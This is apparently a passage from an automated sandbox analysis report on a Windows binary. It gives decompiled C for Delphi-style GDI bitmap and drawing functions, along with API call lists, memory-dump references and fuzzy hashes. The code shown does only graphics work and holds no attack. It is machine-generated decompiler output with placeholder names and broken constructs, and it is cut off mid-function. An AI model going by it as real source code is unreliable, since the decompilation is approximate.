                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,?,?,?,?,008800C6), ref: 0042055A
                                                                                • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00660046), ref: 0042057F
                                                                                • SetTextColor.GDI32(?,0041F807), ref: 00420589
                                                                                • SetBkColor.GDI32(?,00000000), ref: 00420593
                                                                                • SelectObject.GDI32(?,00000000), ref: 004205A6
                                                                                • DeleteObject.GDI32(?), ref: 004205AF
                                                                                • SelectPalette.GDI32(?,00000000,00000000), ref: 004205D1
                                                                                • DeleteDC.GDI32(?), ref: 004205DA
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Select$ObjectPalette$ColorStretch$CompatibleCreateDelete$BitmapText$MaskRealize
                                                                                • String ID:
                                                                                • API String ID: 3976802218-0
                                                                                • Opcode ID: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction ID: e8595f71b62ae0b459171dff56d3c2f5d04765a8323d631b6e7ee7ab11d0db60
                                                                                • Opcode Fuzzy Hash: ef88948618eda5008899333fc6243be902a3193d4f5d48222ccf27fb4a7413a6
                                                                                • Instruction Fuzzy Hash: 0B81B4B1A00219AFDB50EEA9CC81FAF77FCAB0D314F51441AF618F7281C278AD508B64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00423754, Relevance: 31.7, APIs: 21, Instructions: 194windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00423754(void* __eax, long __ecx, struct HPALETTE__* __edx) {
				struct HBITMAP__* _v8;
				struct HDC__* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				char _v21;
				void* _v28;
				void* _v32;
				intOrPtr _v92;
				intOrPtr _v96;
				int _v108;
				int _v112;
				void _v116;
				int _t68;
				long _t82;
				void* _t117;
				intOrPtr _t126;
				intOrPtr _t127;
				long _t130;
				struct HPALETTE__* _t133;
				void* _t137;
				void* _t139;
				intOrPtr _t140;

				_t137 = _t139;
				_t140 = _t139 + 0xffffff90;
				_t130 = __ecx;
				_t133 = __edx;
				_t117 = __eax;
				_v8 = 0;
				if(__eax == 0 || GetObjectA(__eax, 0x54,  &_v116) == 0) {
					return _v8;
				} else {
					E00422C48(_t117);
					_v12 = 0;
					_v20 = 0;
					_push(_t137);
					_push(0x42394f);
					_push( *[fs:eax]);
					 *[fs:eax] = _t140;
					_v12 = E004201BC(GetDC(0));
					_v20 = E004201BC(CreateCompatibleDC(_v12));
					_v8 = CreateBitmap(_v112, _v108, 1, 1, 0);
					if(_v8 == 0) {
						L18:
						_t68 = 0;
						_pop(_t126);
						 *[fs:eax] = _t126;
						_push(0x423956);
						if(_v20 != 0) {
							_t68 = DeleteDC(_v20);
						}
						if(_v12 != 0) {
							return ReleaseDC(0, _v12);
						}
						return _t68;
					} else {
						_v32 = SelectObject(_v20, _v8);
						if(_t130 != 0x1fffffff) {
							_v16 = E004201BC(CreateCompatibleDC(_v12));
							_push(_t137);
							_push(0x423907);
							_push( *[fs:eax]);
							 *[fs:eax] = _t140;
							if(_v96 == 0) {
								_v21 = 0;
							} else {
								_v21 = 1;
								_v92 = 0;
								_t117 = E0042308C(_t117, _t133, _t133, 0,  &_v116);
							}
							_v28 = SelectObject(_v16, _t117);
							if(_t133 != 0) {
								SelectPalette(_v16, _t133, 0);
								RealizePalette(_v16);
								SelectPalette(_v20, _t133, 0);
								RealizePalette(_v20);
							}
							_t82 = SetBkColor(_v16, _t130);
							BitBlt(_v20, 0, 0, _v112, _v108, _v16, 0, 0, 0xcc0020);
							SetBkColor(_v16, _t82);
							if(_v28 != 0) {
								SelectObject(_v16, _v28);
							}
							if(_v21 != 0) {
								DeleteObject(_t117);
							}
							_pop(_t127);
							 *[fs:eax] = _t127;
							_push(0x42390e);
							return DeleteDC(_v16);
						} else {
							PatBlt(_v20, 0, 0, _v112, _v108, 0x42);
							if(_v32 != 0) {
								SelectObject(_v20, _v32);
							}
							goto L18;
						}
					}
				}
			}

























                                                                                0x00423755
                                                                                0x00423757
                                                                                0x0042375d
                                                                                0x0042375f
                                                                                0x00423761
                                                                                0x00423765
                                                                                0x0042376a
                                                                                0x0042395f
                                                                                0x00423784
                                                                                0x00423786
                                                                                0x0042378d
                                                                                0x00423792
                                                                                0x00423797
                                                                                0x00423798
                                                                                0x0042379d
                                                                                0x004237a0
                                                                                0x004237af
                                                                                0x004237c0
                                                                                0x004237d6
                                                                                0x004237dd
                                                                                0x00423921
                                                                                0x00423921
                                                                                0x00423923
                                                                                0x00423926
                                                                                0x00423929
                                                                                0x00423932
                                                                                0x00423938
                                                                                0x00423938
                                                                                0x00423941
                                                                                0x00000000
                                                                                0x00423949
                                                                                0x0042394e
                                                                                0x004237e3
                                                                                0x004237f0
                                                                                0x004237f9
                                                                                0x00423825
                                                                                0x0042382a
                                                                                0x0042382b
                                                                                0x00423830
                                                                                0x00423833
                                                                                0x0042383a
                                                                                0x0042385a
                                                                                0x0042383c
                                                                                0x0042383c
                                                                                0x00423842
                                                                                0x00423856
                                                                                0x00423856
                                                                                0x00423868
                                                                                0x0042386d
                                                                                0x00423876
                                                                                0x0042387f
                                                                                0x0042388b
                                                                                0x00423894
                                                                                0x00423894
                                                                                0x0042389e
                                                                                0x004238c2
                                                                                0x004238cc
                                                                                0x004238d5
                                                                                0x004238df
                                                                                0x004238df
                                                                                0x004238e8
                                                                                0x004238eb
                                                                                0x004238eb
                                                                                0x004238f2
                                                                                0x004238f5
                                                                                0x004238f8
                                                                                0x00423906
                                                                                0x004237fb
                                                                                0x0042380d
                                                                                0x00423912
                                                                                0x0042391c
                                                                                0x0042391c
                                                                                0x00000000
                                                                                0x00423912
                                                                                0x004237f9
                                                                                0x004237dd

                                                                                APIs
                                                                                • GetObjectA.GDI32(00000000,00000054,?), ref: 00423777
                                                                                • GetDC.USER32(00000000), ref: 004237A5
                                                                                • CreateCompatibleDC.GDI32(?), ref: 004237B6
                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 004237D1
                                                                                • SelectObject.GDI32(?,00000000), ref: 004237EB
                                                                                • PatBlt.GDI32(?,00000000,00000000,?,?,00000042), ref: 0042380D
                                                                                • CreateCompatibleDC.GDI32(?), ref: 0042381B
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00423863
                                                                                • SelectPalette.GDI32(00000000,?,00000000), ref: 00423876
                                                                                • RealizePalette.GDI32(00000000), ref: 0042387F
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0042388B
                                                                                • RealizePalette.GDI32(?), ref: 00423894
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 0042389E
                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 004238C2
                                                                                • SetBkColor.GDI32(00000000,00000000), ref: 004238CC
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 004238DF
                                                                                • DeleteObject.GDI32(00000000), ref: 004238EB
                                                                                • DeleteDC.GDI32(00000000), ref: 00423901
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042391C
                                                                                • DeleteDC.GDI32(00000000), ref: 00423938
                                                                                • ReleaseDC.USER32 ref: 00423949
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: ObjectSelect$Palette$CreateDelete$ColorCompatibleRealize$BitmapRelease
                                                                                • String ID:
                                                                                • API String ID: 332224125-0
                                                                                • Opcode ID: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction ID: ad944dd91036beafc7ec954165db9b70d0383b0724a4ea5891ac7e38479d5bc1
                                                                                • Opcode Fuzzy Hash: 7c414300d548b624f4b701a6a1d4ce2a0878781e04664db4c8e827d668d4d119
                                                                                • Instruction Fuzzy Hash: A35162B1F00224ABDB10EFE9DC45BAEB7FCAB09704F51442AB114F7281C6BCA9508B58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00424550, Relevance: 30.1, APIs: 14, Strings: 3, Instructions: 351windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 79%
                                                                                			E00424550(intOrPtr __eax, void* __ebx, void* __ecx, intOrPtr* __edx, void* __edi, void* __esi, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				struct HDC__* _v16;
				struct HDC__* _v20;
				void* _v24;
				BITMAPINFOHEADER* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v37;
				struct HBITMAP__* _v44;
				void* _v48;
				struct HPALETTE__* _v52;
				struct HPALETTE__* _v56;
				intOrPtr* _v60;
				intOrPtr* _v64;
				short _v66;
				short _v68;
				signed short _v70;
				signed short _v72;
				void* _v76;
				intOrPtr _v172;
				char _v174;
				intOrPtr _t150;
				signed int _t160;
				intOrPtr _t164;
				signed int _t193;
				signed int _t218;
				signed short _t224;
				intOrPtr _t251;
				intOrPtr* _t255;
				intOrPtr _t261;
				intOrPtr _t299;
				intOrPtr _t300;
				intOrPtr _t305;
				signed int _t307;
				signed int _t327;
				void* _t329;
				void* _t330;
				signed int _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				intOrPtr _t335;

				_t326 = __edi;
				_t333 = _t334;
				_t335 = _t334 + 0xffffff54;
				_t329 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v52 = 0;
				_v44 = 0;
				_v60 = 0;
				 *((intOrPtr*)( *_v12 + 8))(__edi, __esi, __ebx, _t332);
				_v37 = _v36 == 0xc;
				if(_v37 != 0) {
					_v36 = 0x28;
				}
				_v28 = E0040272C(_v36 + 0x40c);
				_v64 = _v28;
				_push(_t333);
				_push(0x424a6d);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_push(_t333);
				_push(0x424a40);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				if(_v37 == 0) {
					 *((intOrPtr*)( *_v12 + 8))();
					_t330 = _t329 - _v36;
					_t150 =  *((intOrPtr*)(_v64 + 0x10));
					if(_t150 != 3 && _t150 != 0) {
						_v60 = E00403584(1);
						if(_a4 == 0) {
							E00402EC8( &_v174, 0xe);
							_v174 = 0x4d42;
							_v172 = _v36 + _t330;
							_a4 =  &_v174;
						}
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						 *((intOrPtr*)( *_v60 + 0xc))();
						E004162A0(_v60,  *_v60, _v12, _t326, _t330, _t330, 0);
						 *((intOrPtr*)( *_v60 + 0x10))();
						_v12 = _v60;
					}
				} else {
					 *((intOrPtr*)( *_v12 + 8))();
					_t261 = _v64;
					E00402EC8(_t261, 0x28);
					_t251 = _t261;
					 *(_t251 + 4) = _v72 & 0x0000ffff;
					 *(_t251 + 8) = _v70 & 0x0000ffff;
					 *((short*)(_t251 + 0xc)) = _v68;
					 *((short*)(_t251 + 0xe)) = _v66;
					_t330 = _t329 - 0xc;
				}
				_t255 = _v64;
				 *_t255 = _v36;
				_v32 = _v28 + _v36;
				if( *((short*)(_t255 + 0xc)) != 1) {
					E0042009C();
				}
				if(_v36 == 0x28) {
					_t224 =  *(_t255 + 0xe);
					if(_t224 == 0x10 || _t224 == 0x20) {
						if( *((intOrPtr*)(_t255 + 0x10)) == 3) {
							E00416230(_v12, 0xc, _v32);
							_v32 = _v32 + 0xc;
							_t330 = _t330 - 0xc;
						}
					}
				}
				if( *(_t255 + 0x20) == 0) {
					 *(_t255 + 0x20) = E0042032C( *(_t255 + 0xe));
				}
				_t327 = _v37 & 0x000000ff;
				_t267 =  *(_t255 + 0x20) * 0;
				E00416230(_v12,  *(_t255 + 0x20) * 0, _v32);
				_t331 = _t330 -  *(_t255 + 0x20) * 0;
				if( *(_t255 + 0x14) == 0) {
					_t307 =  *(_t255 + 0xe) & 0x0000ffff;
					_t218 = E0042034C( *((intOrPtr*)(_t255 + 4)), 0x20, _t307);
					asm("cdq");
					_t267 = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
					 *(_t255 + 0x14) = _t218 * (( *(_t255 + 8) ^ _t307) - _t307);
				}
				_t160 =  *(_t255 + 0x14);
				if(_t331 > _t160) {
					_t331 = _t160;
				}
				if(_v37 != 0) {
					E004205F4(_v32);
				}
				_v16 = E004201BC(GetDC(0));
				_push(_t333);
				_push(0x4249bb);
				_push( *[fs:edx]);
				 *[fs:edx] = _t335;
				_t164 =  *((intOrPtr*)(_v64 + 0x10));
				if(_t164 == 0 || _t164 == 3) {
					if( *0x46b514 == 0) {
						_v44 = CreateDIBSection(_v16, _v28, 0,  &_v24, 0, 0);
						if(_v44 == 0 || _v24 == 0) {
							if(GetLastError() != 0) {
								E0040B264(_t255, _t267, _t327, _t331);
							} else {
								E0042009C();
							}
						}
						_push(_t333);
						_push( *[fs:eax]);
						 *[fs:eax] = _t335;
						E00416230(_v12, _t331, _v24);
						_pop(_t299);
						 *[fs:eax] = _t299;
						_t300 = 0x42498a;
						 *[fs:eax] = _t300;
						_push(0x4249c2);
						return ReleaseDC(0, _v16);
					} else {
						goto L27;
					}
				} else {
					L27:
					_v20 = 0;
					_v24 = E0040272C(_t331);
					_push(_t333);
					_push(0x424923);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_t273 = _t331;
					E00416230(_v12, _t331, _v24);
					_v20 = E004201BC(CreateCompatibleDC(_v16));
					_v48 = SelectObject(_v20, CreateCompatibleBitmap(_v16, 1, 1));
					_v56 = 0;
					_t193 =  *(_v64 + 0x20);
					if(_t193 > 0) {
						_t273 = _t193;
						_v52 = E004208AC(0, _t193);
						_v56 = SelectPalette(_v20, _v52, 0);
						RealizePalette(_v20);
					}
					_push(_t333);
					_push(0x4248f7);
					_push( *[fs:edx]);
					 *[fs:edx] = _t335;
					_v44 = CreateDIBitmap(_v20, _v28, 4, _v24, _v28, 0);
					if(_v44 == 0) {
						if(GetLastError() != 0) {
							E0040B264(_t255, _t273, _t327, _t331);
						} else {
							E0042009C();
						}
					}
					_pop(_t305);
					 *[fs:eax] = _t305;
					_push(0x4248fe);
					if(_v56 != 0) {
						SelectPalette(_v20, _v56, 0xffffffff);
					}
					return DeleteObject(SelectObject(_v20, _v48));
				}
			}














































                                                                                0x00424550
                                                                                0x00424551
                                                                                0x00424553
                                                                                0x0042455c
                                                                                0x0042455e
                                                                                0x00424561
                                                                                0x00424566
                                                                                0x0042456b
                                                                                0x00424570
                                                                                0x00424580
                                                                                0x00424587
                                                                                0x0042458f
                                                                                0x00424591
                                                                                0x00424591
                                                                                0x004245a8
                                                                                0x004245ae
                                                                                0x004245b3
                                                                                0x004245b4
                                                                                0x004245b9
                                                                                0x004245bc
                                                                                0x004245c1
                                                                                0x004245c2
                                                                                0x004245c7
                                                                                0x004245ca
                                                                                0x004245d1
                                                                                0x00424630
                                                                                0x00424633
                                                                                0x00424639
                                                                                0x0042463f
                                                                                0x00424659
                                                                                0x00424660
                                                                                0x0042466f
                                                                                0x00424674
                                                                                0x00424682
                                                                                0x0042468e
                                                                                0x0042468e
                                                                                0x0042469e
                                                                                0x004246ae
                                                                                0x004246c2
                                                                                0x004246d1
                                                                                0x004246e3
                                                                                0x004246e9
                                                                                0x004246e9
                                                                                0x004245d3
                                                                                0x004245e3
                                                                                0x004245e6
                                                                                0x004245f2
                                                                                0x004245f7
                                                                                0x004245fd
                                                                                0x00424604
                                                                                0x0042460b
                                                                                0x00424613
                                                                                0x00424617
                                                                                0x00424617
                                                                                0x004246ec
                                                                                0x004246f2
                                                                                0x004246fa
                                                                                0x00424702
                                                                                0x00424704
                                                                                0x00424704
                                                                                0x0042470d
                                                                                0x0042470f
                                                                                0x00424717
                                                                                0x00424723
                                                                                0x00424730
                                                                                0x00424735
                                                                                0x00424739
                                                                                0x00424739
                                                                                0x00424723
                                                                                0x00424717
                                                                                0x00424740
                                                                                0x0042474b
                                                                                0x0042474b
                                                                                0x00424751
                                                                                0x0042475d
                                                                                0x00424766
                                                                                0x00424778
                                                                                0x0042477e
                                                                                0x00424780
                                                                                0x0042478c
                                                                                0x00424796
                                                                                0x0042479b
                                                                                0x0042479e
                                                                                0x0042479e
                                                                                0x004247a1
                                                                                0x004247a6
                                                                                0x004247a8
                                                                                0x004247a8
                                                                                0x004247ae
                                                                                0x004247b3
                                                                                0x004247b3
                                                                                0x004247c4
                                                                                0x004247c9
                                                                                0x004247ca
                                                                                0x004247cf
                                                                                0x004247d2
                                                                                0x004247d8
                                                                                0x004247dd
                                                                                0x004247eb
                                                                                0x00424941
                                                                                0x00424948
                                                                                0x00424957
                                                                                0x00424960
                                                                                0x00424959
                                                                                0x00424959
                                                                                0x00424959
                                                                                0x00424957
                                                                                0x00424967
                                                                                0x0042496d
                                                                                0x00424970
                                                                                0x0042497b
                                                                                0x00424982
                                                                                0x00424985
                                                                                0x004249a4
                                                                                0x004249a7
                                                                                0x004249aa
                                                                                0x004249ba
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004247f1
                                                                                0x004247f1
                                                                                0x004247f3
                                                                                0x004247fd
                                                                                0x00424802
                                                                                0x00424803
                                                                                0x00424808
                                                                                0x0042480b
                                                                                0x00424811
                                                                                0x00424816
                                                                                0x00424829
                                                                                0x00424843
                                                                                0x00424848
                                                                                0x0042484e
                                                                                0x00424853
                                                                                0x00424855
                                                                                0x00424861
                                                                                0x00424873
                                                                                0x0042487a
                                                                                0x0042487a
                                                                                0x00424881
                                                                                0x00424882
                                                                                0x00424887
                                                                                0x0042488a
                                                                                0x004248a3
                                                                                0x004248aa
                                                                                0x004248b3
                                                                                0x004248bc
                                                                                0x004248b5
                                                                                0x004248b5
                                                                                0x004248b5
                                                                                0x004248b3
                                                                                0x004248c3
                                                                                0x004248c6
                                                                                0x004248c9
                                                                                0x004248d2
                                                                                0x004248de
                                                                                0x004248de
                                                                                0x004248f6
                                                                                0x004248f6

                                                                                APIs
                                                                                • GetDC.USER32(00000000), ref: 004247BA
                                                                                • CreateCompatibleDC.GDI32(00000001), ref: 0042481F
                                                                                • CreateCompatibleBitmap.GDI32(00000001,00000001,00000001), ref: 00424834
                                                                                • SelectObject.GDI32(?,00000000), ref: 0042483E
                                                                                • SelectPalette.GDI32(?,?,00000000), ref: 0042486E
                                                                                • RealizePalette.GDI32(?), ref: 0042487A
                                                                                • CreateDIBitmap.GDI32(?,?,00000004,00000000,?,00000000), ref: 0042489E
                                                                                • GetLastError.KERNEL32(?,?,00000004,00000000,?,00000000,00000000,004248F7,?,?,00000000,00000001,00000001,00000001,00000001,00000000), ref: 004248AC
                                                                                • SelectPalette.GDI32(?,00000000,000000FF), ref: 004248DE
                                                                                • SelectObject.GDI32(?,?), ref: 004248EB
                                                                                • DeleteObject.GDI32(00000000), ref: 004248F1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000002.00000002.781461693.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000002.00000002.781450349.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781523475.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781534355.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781549939.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781559354.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781573035.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000002.00000002.781587724.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Select$CreateObjectPalette$BitmapCompatible$DeleteErrorLastRealize
                                                                                • String ID: ($0!A$BM
                                                                                • API String ID: 2831685396-1515617234
                                                                                • Opcode ID: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction ID: 460c956ee79e1a374af29936669ac4285e96445d6daf9193b4eb6fa02d8a22bf
                                                                                • Opcode Fuzzy Hash: 9004de23caba881e76fdc33fc15824efd6e843578893ffe631264b90b5f74ea2
                                                                                • Instruction Fuzzy Hash: CED15175B002189FDF04EFA9D885BAEBBF5EF89304F51806AE505E7391D7389840CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0046647C, Relevance: 23.0, APIs: 15, Instructions: 468COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E0046647C(intOrPtr __eax, char __edx) {
				intOrPtr _v8;
				char _v9;
				intOrPtr* _v16;
				intOrPtr* _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				char _v44;
				char _v60;
				void* __edi;
				void* __ebp;
				signed int _t170;
				signed int _t176;
				void* _t209;
				void* _t213;
				intOrPtr _t218;
				intOrPtr _t241;
				void* _t254;
				struct HDC__* _t273;
				struct HDC__* _t287;
				void* _t327;
				void* _t348;
				void* _t365;
				void* _t372;
				intOrPtr _t387;
				intOrPtr _t393;
				struct HDC__* _t397;
				struct HDC__* _t398;
				struct HDC__* _t399;
				void* _t426;
				void* _t427;
				void* _t428;
				intOrPtr _t452;
				intOrPtr _t469;
				void* _t483;
				int _t491;
				int _t496;
				void* _t498;
				void* _t500;
				intOrPtr _t501;
				void* _t511;

				_t498 = _t500;
				_t501 = _t500 + 0xffffffc8;
				_v9 = __edx;
				_v8 = __eax;
				if(_v9 == 2 &&  *(_v8 + 0x20) < 3) {
					_v9 = 0;
				}
				_t393 =  *((intOrPtr*)(_v8 + 0xc));
				if(_t393 != 0xffffffff) {
					L24:
					return _t393;
				} else {
					_t170 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
					if((_t170 |  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))()) == 0) {
						goto L24;
					} else {
						_t176 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x2c))();
						asm("cdq");
						_t491 = _t176 / ( *(_v8 + 0x20) & 0x000000ff);
						_t496 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x20))();
						if( *((intOrPtr*)(_v8 + 8)) == 0) {
							_t508 =  *0x46bc88;
							if( *0x46bc88 == 0) {
								 *0x46bc88 = E00466170(1);
							}
							_t387 =  *0x46bc88; // 0x0
							 *((intOrPtr*)(_v8 + 8)) = E004661E4(_t387, _t496, _t491);
						}
						_v16 = E00423960(1);
						 *[fs:eax] = _t501;
						 *((intOrPtr*)( *_v16 + 0x40))( *[fs:eax], 0x466a2b, _t498);
						 *((intOrPtr*)( *_v16 + 0x34))();
						E00412984(0, _t491, 0,  &_v44, _t496);
						E0041F338( *((intOrPtr*)(E00423F28(_v16) + 0x14)), _t491, 0x8000000f, _t491, _t498, _t508);
						E004236F0( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v8 + 4)))) + 0x24))());
						 *((intOrPtr*)( *_v16 + 0x38))();
						if(_v9 >=  *(_v8 + 0x20)) {
						}
						E00412984(0 * _t491, 1 * _t491, 0,  &_v60, _t496);
						_t209 = _v9 - 1;
						_t511 = _t209;
						if(_t511 < 0) {
							L14:
							_push( &_v60);
							_t213 = E00423F28( *((intOrPtr*)(_v8 + 4)));
							E0041F868(E00423F28(_v16),  &_v44, _t512, _t213);
							_t218 =  *((intOrPtr*)(_v8 + 4));
							_t513 =  *((char*)(_t218 + 0x38)) - 1;
							if( *((char*)(_t218 + 0x38)) != 1) {
								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)), 0x20000000, _v16, __eflags);
							} else {
								 *((intOrPtr*)(_v8 + 0xc)) = E00466114( *((intOrPtr*)(_v8 + 8)),  *((intOrPtr*)(_v8 + 0x1c)), _v16, _t513);
							}
							goto L23;
						} else {
							if(_t511 == 0) {
								_v24 = 0;
								_v20 = 0;
								 *[fs:eax] = _t501;
								_v24 = E00423960(1);
								_v20 = E00423960(1);
								 *((intOrPtr*)( *_v20 + 8))( *[fs:eax], 0x4669ef, _t498);
								 *((intOrPtr*)( *_v20 + 0x6c))();
								_t241 = _v8;
								__eflags =  *((char*)(_t241 + 0x20)) - 1;
								if( *((char*)(_t241 + 0x20)) <= 1) {
									 *((intOrPtr*)( *_v24 + 8))();
									 *((intOrPtr*)( *_v24 + 0x6c))();
									E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)),  *_v24, 0, _t491, _t498, __eflags);
									_t420 =  *_v24;
									 *((intOrPtr*)( *_v24 + 0x40))();
									_t254 = E00423FE4(_v24);
									__eflags = _t254;
									if(_t254 != 0) {
										E0041EB4C( *((intOrPtr*)(E00423F28(_v24) + 0xc)), 0xffffff);
										__eflags = 0;
										E00424D78(_v24, 0);
										E0041F338( *((intOrPtr*)(E00423F28(_v24) + 0x14)), _t420, 0xffffff, _t491, _t498, __eflags);
									}
									E00424D78(_v24, 1);
									_t396 = E00423F28(_v16);
									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x8000000f, _t491, _t498, __eflags);
									E0041F9D0(_t258,  &_v44);
									E0041F338( *((intOrPtr*)(_t258 + 0x14)), _t420, 0x80000014, _t491, _t498, __eflags);
									SetTextColor(E0041FDC4(_t396), 0);
									SetBkColor(E0041FDC4(_t396), 0xffffff);
									_t273 = E0041FDC4(E00423F28(_v24));
									BitBlt(E0041FDC4(_t396), 1, 1, _t491, _t496, _t273, 0, 0, 0xe20746);
									E0041F338( *((intOrPtr*)(_t396 + 0x14)), _t420, 0x80000010, _t491, _t498, __eflags);
									SetTextColor(E0041FDC4(_t396), 0);
									SetBkColor(E0041FDC4(_t396), 0xffffff);
									_t287 = E0041FDC4(E00423F28(_v24));
									BitBlt(E0041FDC4(_t396), 0, 0, _t491, _t496, _t287, 0, 0, 0xe20746);
								} else {
									_v28 = E00423F28(_v16);
									E00423F28(_v20);
									E0041F868(_v28,  &_v44, __eflags,  &_v60);
									E00424D78(_v24, 1);
									 *((intOrPtr*)( *_v24 + 0x40))();
									 *((intOrPtr*)( *_v24 + 0x34))();
									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)),  *_v24, 0xffffff, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E00423F28(_v20));
									_t327 = E00423F28(_v24);
									_pop(_t426);
									E0041F868(_t327,  &_v44, __eflags);
									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t426, 0x80000014, _t491, _t498, __eflags);
									_t397 = E0041FDC4(_v28);
									SetTextColor(_t397, 0);
									SetBkColor(_t397, 0xffffff);
									BitBlt(_t397, 0, 0, _t491, _t496, E0041FDC4(E00423F28(_v24)), 0, 0, 0xe20746);
									E0041F338( *((intOrPtr*)(E00423F28(_v20) + 0x14)), _t426, 0x808080, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E00423F28(_v20));
									_t348 = E00423F28(_v24);
									_pop(_t427);
									E0041F868(_t348,  &_v44, __eflags);
									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t427, 0x80000010, _t491, _t498, __eflags);
									_t398 = E0041FDC4(_v28);
									SetTextColor(_t398, 0);
									SetBkColor(_t398, 0xffffff);
									BitBlt(_t398, 0, 0, _t491, _t496, E0041FDC4(E00423F28(_v24)), 0, 0, 0xe20746);
									_push(E0041E68C( *((intOrPtr*)(_v8 + 0x1c))));
									_t365 = E00423F28(_v20);
									_pop(_t483);
									E0041F338( *((intOrPtr*)(_t365 + 0x14)), _t427, _t483, _t491, _t498, __eflags);
									_push( &_v60);
									_push(E00423F28(_v20));
									_t372 = E00423F28(_v24);
									_pop(_t428);
									E0041F868(_t372,  &_v44, __eflags);
									E0041F338( *((intOrPtr*)(_v28 + 0x14)), _t428, 0x8000000f, _t491, _t498, __eflags);
									_t399 = E0041FDC4(_v28);
									SetTextColor(_t399, 0);
									SetBkColor(_t399, 0xffffff);
									BitBlt(_t399, 0, 0, _t491, _t496, E0041FDC4(E00423F28(_v24)), 0, 0, 0xe20746);
								}
								__eflags = 0;
								_pop(_t469);
								 *[fs:eax] = _t469;
								_push(0x4669f6);
								E004035B4(_v20);
								return E004035B4(_v24);
							} else {
								_t512 = _t209 - 0xffffffffffffffff;
